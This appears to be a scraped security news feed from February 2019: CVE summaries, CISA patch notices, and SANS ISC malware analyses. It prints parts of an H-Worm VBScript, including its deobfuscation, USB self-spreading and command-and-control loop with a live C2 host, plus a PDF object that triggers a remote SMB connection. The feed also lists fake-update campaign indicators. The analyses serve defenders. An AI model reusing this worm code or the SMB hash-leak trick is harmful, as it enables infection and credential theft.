Vulnerability in Easy2map-photos WordPress Plugin v1.09 allows SQL Injection via unsanitized mapTemplateName, mapName, mapSettingsXML, parentCSSXML, photoCSSXML, mapCSSXML, mapHTML,mapID variables 2019-02-15 not yet calculated CVE-2015-4615
MISC
MISC
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is authenticated remote command execution. 2019-02-10 not yet calculated CVE-2018-20767
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. An attacker can execute PHP code by leveraging a writable file. 2019-02-10 not yet calculated CVE-2018-20768
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is a Local File Inclusion vulnerability. 2019-02-10 not yet calculated CVE-2018-20769
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is unauthenticated Remote Command Execution. 2019-02-10 not yet calculated CVE-2018-20771
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is Blind SQL Injection. 2019-02-10 not yet calculated CVE-2018-20770
CONFIRM
yingzhi — python_programming_language Vulnerability in YingZhi Python Programming Language v1.9 allows arbitrary anonymous uploads to the phone’s storage 2019-02-15 not yet calculated CVE-2013-5654
MISC
MISC
yokogawa — multiple_products License Manager Service of YOKOGAWA products (CENTUM VP (R5.01.00 – R6.06.00), CENTUM VP Entry Class (R5.01.00 – R6.06.00), ProSafe-RS (R3.01.00 – R4.04.00), PRM (R4.01.00 – R4.02.00), B/M9000 VP(R7.01.01 – R8.02.03)) allows remote attackers to bypass access restriction to send malicious files to the PC where License Manager Service runs via unspecified vectors. 2019-02-13 not yet calculated CVE-2019-5909
MISC
BID
MISC
zoho_manageengine — servicedesk_plus Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 allows remote attackers to upload arbitrary files via login page customization. 2019-02-16 not yet calculated CVE-2019-8394
CONFIRM
zoho_manageengine — servicedesk_plus An Insecure Direct Object Reference (IDOR) vulnerability exists in Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10007 via an attachment to a request. 2019-02-16 not yet calculated CVE-2019-8395
CONFIRM

Back to top


This product is provided subject to this Notification and this Privacy & Use policy.

Special Webcast: The SANS ICS Summit 2019 and What to Expect – February 18, 2019 1:00pm US/Eastern

This post was originally published on this site

Speakers: Robert M. Lee, Tim Conway

Join Robert M. Lee and Tim Conway as they discuss and highlight upcoming ICS talks and exciting networking opportunities at the SANS ICS Security Summit 2019. Now in its 14th year, the annual ICS Security Summit brings together practitioners and leading experts to share ideas, methods, and techniques for defending control system environments. In-depth presentations and interactive panel discussions deliver real-world approaches that work and make a difference for the individuals fighting this fight every day.

The ICS Security Summit will address a wide range of topics, including:

  • Understanding what an attack against your organization will look like (deconstructing real-world ICS attacks and technical threats)
  • Live attack demonstrations & the defenses needed to stop them
  • Case studies and success stories
  • System and organizational investment opportunities that reduce attacker effects
  • Future attack vectors on ICS
  • Mitigations – Defenders, governance, and controls

Learn More

VMware Releases Security Updates

This post was originally published on this site

Original release date: February 15, 2019

VMware has released security updates to address a vulnerability affecting multiple VMware products. An attacker could exploit this vulnerability to take control of an affected system.  

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2019-0001 and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.

Old H-Worm Delivered Through GitHub, (Thu, Feb 14th)

This post was originally published on this site

Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Event sites from the Alexa Top-1M may deliver malicious content (Github current position is 51[1]). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:

hxxps://raw.githubusercontent[.]com/sidilig/sharing/ebk-ci/Ebanking.zip

Let’s have a look at the archive content:

ISC $ shasum -a 256 Ebanking.zip
abb244010410ce6012bac9e4fc902432cfebe06724d014c63d9ef21f0a6b8b78  Ebanking.zip
ISC $ unzip -t Ebanking.zip
Archive:  Ebanking.zip
    testing: Mesures de sécurité.jar   OK
    testing: Habilitations Ebank.vbs   OK
No errors detected in compressed data of Ebanking.zip.
ISC $ shasum -a 256 *
d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b  Habilitations Ebank.vbs
7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a  Mesures de sécurité.jar

Let’s have a look at the VBScript code. It’s based on a big class:

Class Values
   ...
End Class
Set myClass = new Values
myClass.Start()

Most part of the code is obfuscated using a simple technique: A chunk of Base64 data is decoded by replacing a set of characters with the letter ‘A’:

Private Function peter_paul(sand, way_off)
  Dim stapler, hp_pc, pillow, ruben
  stapler = "!@"
  hp_pc = "A"
  pillow = "Q29uc3QgVHlw....."
  ruben = Replace(pillow, stapler, hp_pc)
  peter_paul = b642byt_arr(1, ruben, 10)
End Function

Easy to decode with Cyberchef:

The decoded data is a new script. The next step is to execute it::

Public Sub Start()
  Set yhm_pepe = CreateObject("ADODB.Stream")
  Set spike = CreateObject("Microsoft.XMLDOM")
  If john_conor(1, peter_paul(0, False)) = ojor Then
    ExecuteGlobal ojor
  End If
End Sub

The code is simply written to the ADODB.Stream then executed. Here is what the second stage does. It copies itself for persistence in %TEMP%tGcuACWROu.vbs then install . An interesting behaviour: it scans for available removable drives (drive.type == 1)[2] and infect them:

for each drive in filesystemobj.drives
  if  drive.isready = true then
    if  drive.freespace  > 0 then
      if  drive.drivetype  = 1 then
        filesystemobj.copyfile wscript.scriptfullname , drive.path & "" & installname,true
        if  filesystemobj.fileexists (drive.path & "" & installname)  then
          filesystemobj.getfile(drive.path & ""  & installname).attributes = 2+4
        end if
        for each file in filesystemobj.getfolder( drive.path & "" ).Files
          if not lnkfile then exit for
            if  instr (file.name,".") then
              if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                  filename = split(file.name,".")
                  set lnkobj = shellobj.createshortcut (drive.path & ""&filename (0)&".lnk")
                  lnkobj.windowstyle = 7
                  lnkobj.targetpath = "cmd.exe"
                  lnkobj.workingdirectory = ""
                  lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ",     chrw(34) & " " & chrw(34)) &"&exit"
                   filleicon = shellobj.regread ("HKEY_LOCAL_MACHINEsoftwareclasses" & shellobj.regread ("HKEY_LOCAL_MACHINEsoftwareclasses." &     split(file.name, ".")(ubound(split(file.name, ".")))& "") & "defaulticon")
                   if  instr (fileicon,",") = 0 then
                     lnkobj.iconlocation = file.path
                   else
                     lnkobj.iconlocation = fileicon
                   end if
                   lnkobj.save()
                 end if
               end if
             end if
           next

When the installation is successful, it starts to communicate with the C2 server:  hxxp://ghanaandco.sytes[.]net:3007.

POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: fr-be
User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019
Accept-Encoding: gzip, deflate
Host: ghanaandco.sytes.net:3007
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Here is a reply from the C2 server:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 12
Server: Indy/9.0.18

sleep<|>5000

Here is the main loop waiting for commands:

while true
  install
  response = ""
  response = post ("is-ready","")
  cmd = split (response,spliter)
  select case cmd (0)
    case "excecute"
      param = cmd (1)
      execute param
    case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
    case "uninstall"
      uninstall
    case "send"
      download cmd (1),cmd (2)
    case "site-send"
      sitedownloader cmd (1),cmd (2)
    case "recv"
      param = cmd (1)
      upload (param)
    case  "enum-driver"
       post "is-enum-driver",enumdriver
     case  "enum-faf"
       param = cmd (1)
       post "is-enum-faf",enumfaf (param)
     case  "enum-process"
       post "is-enum-process",enumprocess
     case  "cmd-shell"
       param = cmd (1)
       post "is-cmd-shell",cmdshell (param)
     case  "delete"
        param = cmd (1)
        deletefaf (param)
      case  "exit-process"
        param = cmd (1)
        exitprocess (param)
      case  "sleep"
        param = cmd (1)
        sleep = eval (param)
    end select
  wscript.sleep sleep
wend

If the delivery method changed, the malicious code is not new. This is a good old H-Worm as already found in 2013[3]. Old stuff but still used in the wild!

[1] https://www.alexa.com/siteinfo/github.com
[2] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/drivetype-property
[3] https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mozilla Releases Security Update for Thunderbird

This post was originally published on this site

Original release date: February 14, 2019

Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.5.1 and apply the necessary update.


This product is provided subject to this Notification and this Privacy & Use policy.

Suspicious PDF Connecting to a Remote SMB Share, (Thu, Feb 14th)

This post was originally published on this site

Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer’s anti-malware solution and placed in the quarantine. Later, the recipient contacted the team in charge of emails to access his document because he knew the sender and pretended that the file was legit.

The file looked indeed safe and the content was properly related to the customer’s business. I did a quick analysis of the file in my sanbox and, once the file opened, Acrobat Reader attempted to connect to a remote SMB share. I extracted objects from the PDF file and there was indeed a reference to a SMB share. When you ask a computer to connect to such a service, you immediately think about NTLM hashes leak.

Here is the object extracted from the PDF:

obj 10 0
 Type: /Page
 Referencing: 9 0 R, 6 0 R, 11 0 R, 12 0 R, 13 0 R, 7 0 R, 2 0 R, 14 0 R, 1 0 R, 15 0 R, 16 0 R, 17 0 R, 18 0 R, 3 0 R, 19 0 R, 20 0 R

  <<
    /AA
      <<
        /O
          <<
            /F '(\virtualofficestorage[.]comdocs_share)'
            /D [ 0 /Fit]
            /S /GoToE
          >>
      >>
    /Parent 9 0 R
    /Contents [6 0 R 11 0 R 12 0 R 13 0 R 7 0 R]
    /Type /Page
    /Resources
      <<
        /ExtGState
          <<
            /Xi1 2 0 R
          >>
        /XObject
          <<
            /BG0 14 0 R
            /Xi0 1 0 R
            /CL 15 0 R
          >>
        /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
        /Font
          <<
            /F_2 16 0 R
            /F_0 17 0 R
            /F_1 18 0 R
            /Xi2 3 0 R
          >>
      >>
    /MediaBox [0 -0.02000 598.80 844.08]
    /Annots [19 0 R 20 0 R]
  >>

The domain virtualofficestorage[.]com[1] resolves to %%ip:185.225.17.98%%, located in Romania. Shodan reports indeed a SMB share:

Helas, it does not reply anymore (last seen on 2019-02-03). There is a website running on this domain, it serves the default Ubuntu Apache welcome page. 

I can’t share the file not the hash but did you notice the same behavious with other PDF documents? Do you know more about this domain? (VT has only one reference to the same kind of document[2])
Please share!

[1] https://www.virustotal.com/#/domain/virtualofficestorage.com
[2] https://www.virustotal.com/#/file/746794ca49f497b43eb53a2fb25c4a0b3782002a45f498c047fa07d46cd43592/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fake Updates campaign still active in 2019, (Wed, Feb 13th)

This post was originally published on this site

Introduction

Last week on 2019-02-06, @baberpervez2 tweeted about a compromised website used by the Fake Updates campaign (link to tweet).  The Fake Updates campaign uses compromised websites that generate traffic to a fake update page.  The type of fake update page depends on your web browser.  Victims would see a fake Flash update page when using Internet Explorer, a fake Chrome update page when using Google Chrome, or a fake Firefox update page when using Firefox.  Victims download JavaScript (.js) files from these pages disguised as browser updates.  The downloaded .js files will instead install malware on a vulnerable Windows host.

Patterns for infection traffic are relatively unchanged since this campaign was first reported on the Malwarebytes blog in April 2018.

I generated an infection from the Fake Updates campaign on Friday 2019-02-09 and again on Monday 2019-02-11.  Both times, the final payload was a Chthonic banking Trojan.  Today’s diary reviews the infection I generated on Monday 2019-02-11.


Shown above:  Flow chart for infection traffic from Monday 2019-02-11.

Screenshots

The following ar screenshots on Fake Updates campaign traffic I generated from the inital compromised website at thetechhaus[.]com.


Shown above:  Fake Chrome update page seen when thetechhaus[.]com was viewed in the Chrome web browser.


Shown above:  You can ignore warnings, download, and run the malicious .js file on a vulnerable Windows host.


Shown above:  The .js file shows highly-obfuscated script, which has always been the case for files from this campaign.


Shown above:  Start of the infection chain traffic filtered in Wireshark.


Shown above: Redirect traffic to track.positiverefreshment[.]org that pointed to fake Chrome update page.


Shown above:  Traffic for fake Chrome update page on 3aak.gotguardsecurity[.]com.


Shown above: HTTPS traffic to dl.dropboxusercontent.com that returned a malicious .js file.


Shown above:  Traffic after running the .js file disguised as a Chrome update.


Shown above:  Final payload (Chthonic banking Trojan) persistent on the infected Windows host.

Indicators of Compromise (IoCs)

The following are indicators associated with the infection on Monday 2019-02-11.

Initial compromised site:

  • thetechhaus[.]com

Redirect that led to fake Chrome update page:

  • 81.4.122[.]193 port 80 – track.positiverefreshment[.]org – GET /s_code.js?[3 requests with different strings of characters]

Traffic for fake Chrome update page:

  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/css.css
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome.min.css
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome_logo_2x.png
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-new.jpg
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/k3k702ZOKiLJc3WVjuplzOgdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/cJZKeOuBrn4kERxqtaUH3VtXRa8TVwTICgirnJhmVJw.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/DXI1ORHCpsQm3Vp6mXoaTegdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/MTP_ySUJH_bn48VBG8sNSugdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-32.png
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=1
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=3
  • Note: each time I saw a fake update page, the IP address was the same, but the domain was always different.

Download of .js file disguised as Chrome update:

  • port 443 – dl.dropboxusercontent.com – HTTPS traffic

Traffic generated by .js file:

  • 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif
  • 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif?ss&ss1img
  • Note: The above domains were also different for each infection.

Post-infection traffic caused by Chthonic banking Trojan:

  • [infected lab host restarted twice]
  • various IP addresses over TCP port 53 – DNS queries for afroamericanec[.]bit
  • 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/
  • 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/www/

Associated malware:

SHA256 hash: 9daa0dec909874316afe7f402e82d408b96b215a3501579849c792ec91cfe750

  • File size: 41,696 bytes
  • File name: Chrome_77.35.js
  • File description: malicious .js file returned from dl.dropboxusercontent.com

SHA256 hash: 4a17789f8a03fb2ec3185322ab879d436470d931e1fb98d0a4b9e5b68cda95ab

  • File size: 406,792 bytes
  • File location: C:Users[username]AppDataLocalTempChrome_77.35.exe
  • File description: Second executable dropped to the infected Windows host (Chthonic)

SHA256 hash: 7356424e04f730c7440f76cd822ff8645693b9835ae6aec4d6840cb1becae45c

  • File size: 406,792 bytes
  • File location: C:Users[username]AppDataRoamingYCommonFilesYCommonFiles.com (random names for directory and file name pair)
  • File description: Chthonic executable persistent on the infected Windows host.

Final words

Monday’s infection was unusual, because everything except for the dropbox URL was regular HTTP traffic.  I more often find HTTPS traffic from the compromised site, redirect traffic, and fake update page.  Usually the only HTTP traffic is generated by the downloaded .js file and final malware payload.

Pcap and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mozilla Releases Security Updates for Firefox

This post was originally published on this site

Original release date: February 12, 2019

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the Mozilla Security Advisories for Firefox 65.0.1 and Firefox ESR 60.5.1 and apply the necessary updates. 


This product is provided subject to this Notification and this Privacy & Use policy.